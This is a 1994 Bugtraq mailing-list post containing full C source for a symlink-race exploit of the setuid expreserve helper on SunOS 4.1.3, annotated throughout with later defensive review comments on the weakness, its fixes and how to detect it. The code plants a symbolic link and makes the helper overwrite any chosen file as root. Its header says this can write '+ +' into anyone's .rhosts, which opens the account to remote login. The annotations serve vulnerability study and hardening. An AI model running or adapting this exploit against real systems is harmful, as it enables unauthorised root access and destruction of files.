Received: from PACIFIC-CARRIER-ANNEX.MIT.EDU by po6.MIT.EDU (5.61/4.7) id AA1591; Mon, 3 Oct 94 00:23:38 EDT Received: from villa.fc.net by MIT.EDU with SMTP id AA27474; Mon, 3 Oct 94 00:23:36 EDT Received: from freeside.fc.net (freeside.fc.net [198.6.198.2]) by villa.fc.net 8.6.8.1/8.6.6) with ESMTP id PAA00219 for <bugtraq-outgoing@villa.fc.net>; Sun, 2 Oct 1994 15:44:22 -0500 Received: (from majordom@localhost) by freeside.fc.net (8.6.8.1/8.6.6) id PAA2217 for bugtraq-outgoing@villa.fc.net; Sun, 2 Oct 1994 15:44:51 -0500 Received: from crimelab.crimelab.com (crimelab.crimelab.com [198.64.127.1]) by reeside.fc.net (8.6.8.1/8.6.6) with ESMTP id PAA22304 for <bugtraq@fc.net>; Sun, 2 Oct 1994 15:44:39 -0500 Received: from relay1.Hawaii.Edu (relay1.Hawaii.Edu [128.171.41.53]) by crimela.crimelab.com (8.6.9/8.6.4) with SMTP id PAA01995 for <bugtraq@crimelab.com>; Sun, 2 Oct 1994 15:40:15 -0500 Received: from uhunix.uhcc.Hawaii.Edu ([128.171.44.6]) by relay1.Hawaii.Edu wit SMTP id <11364>; Sun, 2 Oct 1994 08:18:27 -1000 Received: by uhunix.uhcc.Hawaii.Edu id <184397>; Sun, 2 Oct 1994 08:18:15 -1000 Message-Id: <94Oct2.081815hst.184397@uhunix.uhcc.Hawaii.Edu> From: Tim Newsham <newsham@uhunix.uhcc.hawaii.edu> To: bugtraq@crimelab.com Date: Sun, 2 Oct 1994 08:18:10 -1000 Sender: bugtraq-owner@crimelab.com Precedence: bulk /* * Exploit a security hole in expreserve on sun4.1.3 * <program> filename * overwrites filename as root with garbage, chown's to you * (note, a 4.1.1 test overwrote with no chown * the first 4 characters written are "+ +\n" * which can be used to overwrite anyones .rhosts as root) * * Tim N. 
 */

/*
 * NOTE(review): defensive reading of this 1994 proof of concept.
 *
 * Weakness class: a privileged helper writes to a predictable pathname
 * inside a directory where the invoking user can create entries, and it
 * follows a symbolic link that is already there (link following /
 * insecure temporary file, CWE-59).  The header comment says the write
 * happens as root; presumably expreserve is installed setuid root on the
 * affected releases -- confirm against vendor documentation.
 *
 * What a fix has to guarantee: the helper must never open a pre-existing
 * name chosen by the user.  Typical measures are creating the output with
 * O_CREAT|O_EXCL (plus O_NOFOLLOW where the platform has it), refusing
 * anything that is not a freshly created regular file, keeping the
 * preserve directory writable only by the privileged owner, or doing the
 * write with the caller's own credentials.  Where the editor recovery
 * feature is not needed, removing the set-id bit removes the exposure.
 *
 * Detection hint: preserved editor buffers are presumably regular files,
 * so a symbolic link under /var/preserve/<user>/ deserves investigation.
 *
 * The code is pre-ANSI (K&R) C and relies on implicit declarations for
 * printf, exit, strcpy and the system calls it uses.
 */
#include <pwd.h>
#include <fcntl.h>

/* Layout constants for the header struct below; presumably chosen to
 * mirror the temp-file header used by ex/expreserve -- TODO confirm. */
#define HBLKS 2
#define FNSIZE 128
#define BLKS 900

/* Local description of the record written at the start of ./Ex.  The
 * author's comment in main() says it is filled in so that expreserve
 * accepts the file as legitimate. */
typedef struct {
    time_t time;
    int uid;
    int flines;
    char name[FNSIZE];
    short Blocks[BLKS];
    short encrypted;
} header;

/*
 * Takes one argument, the destination path.  Plants a symbolic link to it
 * under /var/preserve/<login>/, writes a header record to ./Ex on
 * descriptor 0 and then executes /usr/lib/expreserve with that file as
 * standard input.  Has no return statement; it ends in execl() or falls
 * off the end after the failure message.
 */
main(argc,argv)
int argc;
char **argv;
{
    int p,u;                    /* u is never used */
    header H;                   /* not zeroed: unset fields hold stack garbage */
    struct passwd *pw;
    char buf[100],*dest;

    if(argc!=2) {
        printf("usage: %s destination\n",argv[0]);
        exit(1);
    }
    dest = argv[1];

    /* execl() below keeps this pid, so p is also the pid the helper runs
     * under; presumably that is how the helper's output name is derived. */
    p = getpid();
    pw = getpwuid(getuid());    /* result is not checked for NULL */
    /* unbounded sprintf into a 100-byte buffer; pw_name length unchecked */
    sprintf(buf,"/var/preserve/%s/Exaaa%.5d",pw->pw_name,p);
    /* The link is created before the helper runs; return value ignored.
     * This is the step an O_EXCL / no-follow create in the helper defeats. */
    symlink(dest,buf);

    /* Closing 0 first makes the following open() return descriptor 0, so
     * ./Ex becomes standard input for the program exec'd later. */
    close(0);
    if(open("./Ex",O_RDWR|O_CREAT,0666)<0) {
        printf("Cant open Ex (temp file)\n");
        exit(2);
    }

    /* fill out header so that expre thinks its legit */
    H.time = 12345; /* who cares */
    /* Copies 5 bytes (4 characters plus NUL) over the start of the struct;
     * with a 4-byte time_t the NUL lands in the next field, which is
     * assigned again below.  The first bytes written are therefore
     * chosen by the caller rather than by the helper. */
    strcpy(&H.time,"+ +\n"); /* its a long, we got some free bytes in there*/
    strcpy(H.name,"NoName");
    H.flines = 0;
    H.uid = getuid();
    H.Blocks[0] = HBLKS;
    H.Blocks[1] = HBLKS+1;
    /* Blocks[2..] and encrypted are never set, which matches the header
     * comment's "overwrites ... with garbage". */
    write(0,&H,sizeof(H));
    lseek(0,0,0);               /* whence 0: rewind to the start of the file */
    printf("Made temp file 'Ex'. You can remove it when done.\n");

    /* Only returns on failure. */
    execl("/usr/lib/expreserve","expreserve",0);
    printf("Couldnt exec!\n");
}